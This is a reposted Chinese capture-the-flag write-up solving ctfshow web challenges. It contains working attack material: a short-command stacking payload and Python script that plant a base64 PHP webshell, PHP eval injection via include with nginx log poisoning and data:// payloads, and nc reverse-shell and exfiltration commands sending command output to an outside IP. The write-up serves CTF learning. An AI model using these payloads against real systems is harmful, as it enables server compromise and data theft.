ctfshow-web【七夕杯】

2023-08-22 92

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： ctfshow-web【七夕杯】

web签到

查看源码

<form class="form-horizontal" role="form" action="api/tools.php" method="post" onsubmit="return check();" >
                                      <div class="form-group">
                                          <label for="command" class="col-lg-2 col-sm-2 control-label">命令</label>
                                          <div class="col-lg-10">
                                              <input onchange="help();" id="cmd" name="cmd" type="text" class="form-control"  placeholder="ls">
                                              <p id="help" class="help-block">仅支持较短命令执行，且不会回显。</p>

<script>
      function help(){
        if(isSafe($("#cmd").val())){
           $("#help").css("color","#69cf56");
           $("#help").html("提交命令执行");
         }else{
           $("#help").css("color","#ec1616");
           $("#help").html("命令字符过长");
         }
      }
            function isSafe(cmd)
            {
                return cmd.length<=7;
            }
            function check(){
               if(isSafe($("#cmd").val())){
                   $("#help").css("color","#69cf56");
           $("#help").html("提交命令执行");
           return true;
         }else{
                   $("#help").css("color","#ec1616");
           $("#help").html("命令字符过长");
           return false ;
         }
            }
        </script>

直接访问api/tools.php，post提交cmd参数

cmd=ls />r
访问/api/r

下载到文件,内容为

bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

写入新的shell到api/1.php

poc如下

payload.txt
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0
import requests
import time
url = "http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/tools.php"
with open("payload.txt", "r") as f:
    for i in f:
        data = {"cmd": i.strip()}
        r=requests.post(url=url,data=data)
        time.sleep(1)
        print(r.text)
test = requests.get("http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:
    print("you've got it!")

访问/api/1.php执行命令拿到flag

也可以直接用nl命令

nl /*>m

easy_calc

<?php
if(check($code)){
    eval('$result='."$code".";");
    echo($result);    
}
function check(&$code){
    $num1=$_POST['num1'];
    $symbol=$_POST['symbol'];
    $num2=$_POST['num2'];
    if(!isset($num1) || !isset($num2) || !isset($symbol) )
    {
        return false;
    }
    if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol))
    {
        return false;
    }
    if(preg_match("/^[\+\-\*\/]$/", $symbol))
    {
        $code = "$num1$symbol$num2";
        return true;
    }
    return false;
}

POST /calc.php HTTP/1.1
Host: b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Content-Length: 24
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Referer: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=1&symbol=%2B&num2=3

最终执行命令的语句是 n u m 1 num1num1symbol$num2 拼接起来的，而且过滤（）不能调用函数，所以根据语言结构是 include、require、echo这种语句，试着去包含文件。

本地环境测试中

$num1='include "C:\Users\admin\Desktop\ip.txt";1';
    $symbol="+";
    $num2="2";

成功回显出ip.txt

num1=include "/etc/passwd";1&symbol=%2B&num2=2

成功回显出passwd

日志包含

num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2

最终流量包

POST /calc.php HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: <?php system('cat /*'); ?>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2

配合data伪协议执行代码

<?php eval($_GET[1]);
PD9waHAgZXZhbCgkX0dFVFsxXSk7
这里可以取消?>来避免编码末位的加号
payload
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1

POST /calc.php?1=system('cat+/secret')%3b HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 88
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1

easy_cmd

<?php
error_reporting(0);
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){
        exec(escapeshellcmd($cmd));
}
?>

正则表达式要求提交的cmd以ping|ls|nc|ifconfig开头，然后进行escapeshellcmd处理

<?php
$cmd="nc -e /bin/bash ip port";
if(preg_match("/^\b(ping|ls|nc|ifconfig|ipconfig)\b/",$cmd))
{
    $out=escapeshellcmd($cmd);
    print_r($out);
}

nc -e /bin/bash ip port

这里发现escapeshellcmd并不会对命令造成修改

因此尝试用nc反弹shell

nc -e /bin/bash ip port
nc  ip port -e /bin/bash

这里的shell连接后秒断开，尝试通过nc将命令结果外带出来

cmd=nc  IP port -e ls /
cmd=nc  IP port -e cat /secret

easy_sql

sql注入类,先跑下被waf的关键词，暂时没做出来

文章标签：

Shell

API

SQL

ctfshow-web【七夕杯】

web签到

easy_calc

easy_cmd

easy_sql

热门文章

最新文章

相关电子书